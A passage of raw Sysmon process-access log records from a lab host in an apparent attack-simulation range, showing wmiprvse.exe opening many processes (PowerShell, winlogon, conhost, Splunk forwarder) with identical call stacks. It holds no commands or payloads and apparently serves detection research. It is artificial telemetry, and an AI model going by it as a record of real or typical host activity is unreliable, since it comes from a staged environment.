Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F2E0C913CCD125EEDA163766F57F62,SHA256=4A949F1FA239BACA223E974A575EECE8756B091808A5E7FACA7EC7A4949A521A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204311Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204310Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204309Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204308Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204307Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204306Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204305Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204304Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204303Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204302Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204301Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204300Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204299Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204298Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204297Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204296Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204295Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204294Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204293Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204292Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.025{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f